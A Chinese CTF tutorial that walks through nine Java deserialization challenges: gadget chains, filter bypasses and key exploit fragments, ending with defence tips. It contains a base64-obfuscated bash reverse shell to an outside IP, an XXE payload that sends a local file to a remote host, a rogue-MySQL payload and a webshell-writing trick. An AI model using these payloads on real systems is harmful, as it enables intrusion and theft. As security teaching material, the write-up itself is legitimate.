Java反序列化漏洞实战教学<\/h1>

目录<\/h2>
[CISCN 2023]deserbug<\/li>
[MTCTF2022]easyjava<\/li>
[羊城杯 2020]a_piece_of_java<\/li>
[红明谷CTF 2021]JavaWeb<\/li>
[HZNUCTF 2023]easyjava<\/li>
[网鼎杯 2020青龙组]FileJava<\/li>
[CISCN 2023 西南]seaclouds<\/li>
[第六届安洵杯]ezjava<\/li>
[CISCN2023华北]normal_snake<\/li> <\/ol>
1. [CISCN 2023]deserbug<\/h2>

漏洞分析<\/h3>
依赖：common-collections-3.2.2和hutool-all-5.8.18<\/li>
CC3.2.2比3.2.1多了一个checkUnsafeSerialization<\/code>函数，禁止了部分类的序列化<\/li>
关键类：MyExpect<\/code>和Testapp<\/code><\/li>
利用点：getAnyexcept()<\/code>方法中的类实例化<\/li>
<\/ul>
利用链<\/h3>
HashMap#readObject() -> HashMap#hash() -> TiedMapEntry#hashCode() -> 
TiedMapEntry#getValue() -> LazyMap#get() -> cn.hutool.json.JSONObject#put() -> 
Myexpect#getAnyexcept() -> TrAXFilter#constructor() -> 
TemplatesImpl#newTransformer() -> Runtime.exec
<\/code><\/pre>
绕过技巧<\/h3>

通过hutool中的put<\/code>方法触发getAnyexcept<\/code><\/li>
使用LazyMap#get<\/code>触发map.put<\/code><\/li>
<\/ul>
利用代码关键点<\/h3>
\/\/ 设置恶意TemplatesImpl
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造Myexpect触发点
<\/span><\/span><\/span><\/span>myexpect.<\/span>setTargetclass<\/span>(<\/span>TrAXFilter.<\/span>class<\/span>);<\/span>
<\/span><\/span>myexpect.<\/span>setTypeparam<\/span>(<\/span>new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>});<\/span>
<\/span><\/span>myexpect.<\/span>setTypearg<\/span>(<\/span>new<\/span> Object[]{<\/span>templates});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造LazyMap链
<\/span><\/span><\/span><\/span>LazyMap lazyMap =<\/span> (<\/span>LazyMap)<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>jsonObject,<\/span>transformer);<\/span>
<\/span><\/span>TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "111"<\/span>);<\/span>
<\/span><\/span>HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span> "1"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. [MTCTF2022]easyjava<\/h2>
漏洞分析<\/h3>

Shiro 1.5.2版本存在;<\/code>绕过权限认证漏洞<\/li>
自定义MyObjectInputStream<\/code>过滤了部分危险类<\/li>
使用commons-beanutils 1.9.4的CB链<\/li>
<\/ul>
利用链<\/h3>
PriorityQueue.readObject() -> PriorityQueue.siftDownUsingComparator() -> 
BeanComparator.compare() -> TemplateImpl.getOutputProperties() -> 
TemplateImpl.newTransformer -> 动态调用类
<\/code><\/pre>
绕过技巧<\/h3>

使用;<\/code>绕过Shiro认证<\/li>
利用未被过滤的BeanComparator<\/code><\/li>
<\/ul>
利用代码关键点<\/h3>
\/\/ 设置恶意TemplatesImpl
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span>codes);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造PriorityQueue触发链
<\/span><\/span><\/span><\/span>BeanComparator beanComparator=<\/span>new<\/span> BeanComparator(<\/span>"outputProperties"<\/span>,<\/span>new<\/span> AttrCompare());<\/span>
<\/span><\/span>PriorityQueue priorityQueue=<\/span>new<\/span> PriorityQueue(<\/span>beanComparator1);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>"2"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 修改属性触发比较
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>beanComparator,<\/span>"property"<\/span>,<\/span>"outputProperties"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>priorityQueue,<\/span>"queue"<\/span>,<\/span>new<\/span> Object[]{<\/span>templates,<\/span>templates});<\/span>
<\/span><\/span><\/code><\/pre>3. [羊城杯 2020]a_piece_of_java<\/h2>
漏洞分析<\/h3>

使用SerialKiller进行反序列化过滤<\/li>
白名单限制：gdufs.*<\/code>和java.lang.*<\/code><\/li>
存在mysql-connect-8.0.19依赖<\/li>
<\/ul>
利用链<\/h3>
通过JDBC反序列化触发：<\/p>

DriverManager.getConnection<\/code>触发JDBC反序列化<\/li>
checkAllInfo<\/code>触发连接<\/li>
InfoInvocationHandler#invoke<\/code>动态代理触发<\/li>
<\/ol>
利用方法<\/h3>

搭建恶意MySQL服务器<\/li>
使用ysoserial生成CC链payload<\/li>
通过CookieData触发<\/li>
<\/ol>
恶意MySQL服务器关键点<\/h3>
# 设置autoDeserialize参数触发反序列化<\/span>
<\/span><\/span>databaseInfo.<\/span>setPassword("123123&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"<\/span>);
<\/span><\/span>
<\/span><\/span># 在MySQL服务器中返回恶意序列化数据<\/span>
<\/span><\/span>mysql_data +=<\/span> data_len_hex +<\/span> '04'<\/span> +<\/span> 'fbfc'<\/span>+<\/span> payload_length_hex
<\/span><\/span>mysql_data +=<\/span> str(payload_content)
<\/span><\/span><\/code><\/pre>4. [红明谷CTF 2021]JavaWeb<\/h2>
漏洞分析<\/h3>

Shiro框架存在权限绕过<\/li>
使用jackson框架<\/li>
最终利用ch.qos.logback.core.db.JNDIConnectionSource<\/code>实现RCE<\/li>
<\/ul>
利用方法<\/h3>

搭建RMI服务<\/li>
实例化恶意类<\/li>
通过JNDI注入触发<\/li>
<\/ol>
恶意类示例<\/h3>
public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    public<\/span> Exploit<\/span>(){<\/span>
<\/span><\/span>        try<\/span>{<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzkuMjkuMTcwLzcwMDAgMD4mIDE=}|{base64,-d}|{bash,-i}"<\/span>);<\/span>
<\/span><\/span>        }<\/span>catch<\/span>(<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. [HZNUCTF 2023]easyjava<\/h2>
漏洞分析<\/h3>

Fastjson 1.2.48<\/li>
使用原生反序列化通过JSON#toString<\/code>触发<\/li>
<\/ul>
利用链<\/h3>
JSON#toString -> json#toJSONString -> get方法
<\/code><\/pre>
利用代码关键点<\/h3>
\/\/ 构造恶意TemplatesImpl
<\/span><\/span><\/span><\/span>setValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> bytes);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用BadAttributeValueExpException触发
<\/span><\/span><\/span><\/span>JSONArray jsonArray =<\/span> new<\/span> JSONArray();<\/span>
<\/span><\/span>jsonArray.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>高版本JDK绕过<\/h3>
使用javaSerializedData<\/code>属性绕过trustURLCodebase<\/code>限制：<\/p>
e.<\/span>addAttribute<\/span>(<\/span>"javaSerializedData"<\/span>,<\/span> Base64.<\/span>decode<\/span>(<\/span>"exp的base64"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>6. [网鼎杯 2020青龙组]FileJava<\/h2>
漏洞分析<\/h3>

Apache POI < 4.1.0存在XXE漏洞(CVE-2014-3529)<\/li>
漏洞触发点：ZipPackage#getPartsImpl<\/code> -> ContentTypeManager#parseContentTypesFile<\/code><\/li>
<\/ul>
利用方法<\/h3>

修改xlsx中的Content-Type文件<\/li>
添加XXE payload<\/li>
文件名必须以excel-<\/code>开头<\/li>
<\/ol>
XXE Payload示例<\/h3>
<!DOCTYPE convert [
<\/span><\/span><\/span><!ENTITY % remote SYSTEM "http:\/\/ip\/file.dtd"><\/span>
<\/span><\/span>%remote;%int;%send;
<\/span><\/span>]>
<\/span><\/span>
<\/span><\/span><!ENTITY % file SYSTEM "file:\/\/\/flag"><\/span>
<\/span><\/span><!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http:\/\/ip:port?p=%file;'><\/span>">
<\/span><\/span><\/code><\/pre>7. [CISCN 2023 西南]seaclouds<\/h2>
漏洞分析<\/h3>

使用kryo反序列化<\/li>
存在二次反序列化绕过<\/li>
<\/ul>
利用链<\/h3>
kyro#readObject() -> hashMap#put() -> HotSwappableTargetSource#equals() -> 
Xstring#equals() -> BaseJsonNode#toString() -> SignedObject#getObject() -> 
HashMap#readObject() -> templatesImpl#getOutputProperties()
<\/code><\/pre>
利用代码关键点<\/h3>
\/\/ 第一次序列化
<\/span><\/span><\/span><\/span>HashMap hashMap=<\/span>new<\/span> HashMap();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>hotSwappableTargetSource,<\/span>"1"<\/span>);<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>hotSwappableTargetSource1,<\/span>"2"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 第二次序列化包装
<\/span><\/span><\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>hashMap,<\/span> kp.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span>POJONode pojoNode1=<\/span>new<\/span> POJONode(<\/span>signedObject);<\/span>
<\/span><\/span><\/code><\/pre>8. [第六届安洵杯]ezjava<\/h2>
漏洞分析<\/h3>

自定义MyObjectInputStream<\/code>过滤了常见利用类<\/li>
存在PostgreSQL JDBC驱动漏洞(CVE-2022-21724)<\/li>
<\/ul>
利用链<\/h3>
BadAttributeValueExpException#readObject() -> TiedMapEntry#getValue() -> 
LazyMap#get() -> TreeMap#put() -> BeanComparator#compare() -> 
BaseDataSource#getConnection() -> org.postgresql.Driver#setupLoggerFromProperties() -> 
org.postgresql.Driver#connect() -> 写入文件
<\/code><\/pre>
利用方法<\/h3>

利用freemarker模板注入<\/li>
通过PostgreSQL的loggerFile<\/code>参数写入webshell<\/li>
<\/ol>
利用代码关键点<\/h3>
\/\/ 设置PostgreSQL连接参数
<\/span><\/span><\/span><\/span>String jdbcUrl =<\/span> "jdbc:postgresql:\/\/127.0.0.1:5432\/test?loggerLevel="<\/span>+<\/span>loggerLevel+<\/span>"&loggerFile="<\/span>+<\/span>loggerFile+<\/span> "&"<\/span>+<\/span>shellContent;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造BeanComparator触发链
<\/span><\/span><\/span><\/span>BeanComparator beanComparator=<\/span>new<\/span> BeanComparator();<\/span>
<\/span><\/span>setFieldValue(<\/span>beanComparator,<\/span> "property"<\/span>,<\/span> "connection"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>9. [CISCN2023华北]normal_snake<\/h2>
漏洞分析<\/h3>

SnakeYAML 1.30反序列化漏洞<\/li>
过滤了!!<\/code>、JAVA、JNDI、JDBC等关键字<\/li>
存在c3p0 0.9.5.2依赖<\/li>
<\/ul>
利用链<\/h3>
通过c3p0的二次反序列化绕过过滤：<\/p>

property.set()<\/code>触发set方法<\/li>
触发setuserOverridesAsString<\/code><\/li>
通过c3p0的动态类加载实现RCE<\/li>
<\/ol>
利用代码关键点<\/h3>
\/\/ 构造c3p0恶意数据源
<\/span><\/span><\/span><\/span>PoolBackedDataSourceBase poolBackedDataSourceBase=<\/span>new<\/span> PoolBackedDataSourceBase(<\/span>false<\/span>);<\/span>
<\/span><\/span>Field connectionPoolDataSource=<\/span>poolBackedDataSourceBase.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"connectionPoolDataSource"<\/span>);<\/span>
<\/span><\/span>connectionPoolDataSource.<\/span>set<\/span>(<\/span>poolBackedDataSourceBase,<\/span>c3P0);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 生成YAML payload
<\/span><\/span><\/span><\/span>String poc =<\/span> "!<tag:yaml.org,2002:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource> {userOverridesAsString: \"HexAsciiSerializedMap:"<\/span> +<\/span> hex +<\/span> ";\"}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>通用防御建议<\/h2>

升级相关库到最新版本<\/li>
使用安全的反序列化工具如SerialKiller<\/li>
实施严格的白名单机制<\/li>
禁用不必要的Java特性<\/li>
对用户输入进行严格过滤<\/li>
<\/ol>
总结<\/h2>
本文详细分析了9个Java反序列化漏洞案例，涵盖了CC链、CB链、JDBC反序列化、SnakeYAML、Fastjson等多种漏洞类型，并提供了详细的利用方法和绕过技巧。理解这些漏洞原理和利用技术对于Java安全研究和防御具有重要意义。<\/p>